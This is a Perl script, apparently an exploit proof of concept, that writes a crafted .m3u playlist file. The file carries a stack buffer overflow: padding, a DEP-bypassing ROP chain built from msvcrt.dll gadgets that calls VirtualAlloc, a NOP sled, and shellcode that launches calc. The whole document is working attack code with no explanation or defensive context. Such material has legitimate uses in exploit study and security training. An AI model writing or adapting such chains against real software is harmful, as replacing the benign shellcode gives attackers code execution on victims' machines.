$file = "ropfinal.m3u";

$buffer = "A" x 432;

# Pointer to RET (start the chain)
$buffer .= pack('V',0x77c11110);

#$buffer .= "A" x 4;
#$buffer .= "B" x 4;
#$buffer .= "C" x 4; 	#Packing to GET EIP at the top of the stack.


$buffer .= pack('V',0x77c534a5);	# POP EBP # RETN [msvcrt.dll]
$buffer .= pack('V',0x77c534a5);	# skip 4 bytes [msvcrt.dll]
$buffer .= pack('V',0x77c46ea3);	# POP EBX # RETN [msvcrt.dll]
$buffer .= pack('V',0xffffffff);	#
$buffer .= pack('V',0x77c127e1);	# INC EBX # RETN [msvcrt.dll]
$buffer .= pack('V',0x77c127e1);	# INC EBX # RETN [msvcrt.dll]
$buffer .= pack('V',0x77c3b860);	# POP EAX # RETN [msvcrt.dll]
$buffer .= pack('V',0x2cfe1467);	# put delta into eax (-> put 0x00001000 into edx)
$buffer .= pack('V',0x77c4eb80);	# ADD EAX);75C13B66 # ADD EAX);5D40C033 # RETN [msvcrt.dll]
$buffer .= pack('V',0x77c58fbc);	# XCHG EAX);EDX # RETN [msvcrt.dll]
$buffer .= pack('V',0x77c34fcd);	# POP EAX # RETN [msvcrt.dll]
$buffer .= pack('V',0x2cfe04a7);	# put delta into eax (-> put 0x00000040 into ecx)
$buffer .= pack('V',0x77c4eb80);	# ADD EAX);75C13B66 # ADD EAX);5D40C033 # RETN [msvcrt.dll]
$buffer .= pack('V',0x77c14001);	# XCHG EAX);ECX # RETN [msvcrt.dll]
$buffer .= pack('V',0x77c47ae8);	# POP EDI # RETN [msvcrt.dll]
$buffer .= pack('V',0x77c47a42);	# RETN (ROP NOP) [msvcrt.dll]
$buffer .= pack('V',0x77c2b104);	# POP ESI # RETN [msvcrt.dll]
$buffer .= pack('V',0x77c2aacc);	# JMP [EAX] [msvcrt.dll]
$buffer .= pack('V',0x77c5289b);	# POP EAX # RETN [msvcrt.dll]
$buffer .= pack('V',0x77c1110c);	# ptr to &VirtualAlloc() [IAT msvcrt.dll]
$buffer .= pack('V',0x77c12df9);	# PUSHAD # RETN [msvcrt.dll]
$buffer .= pack('V',0x77c35524);	# ptr to 'push esp # ret ' [msvcrt.dll]

$buffer .= "\x90" x 16;

$buffer .=  "\x31\xC9"                    
        ."\x51"                           
        ."\x68\x63\x61\x6C\x63"          
        ."\x54"                          
        ."\xB8\xC7\x93\xC2\x77"           
        ."\xFF\xD0";

open($FILE,">$file");
print $FILE $buffer;
close($FILE);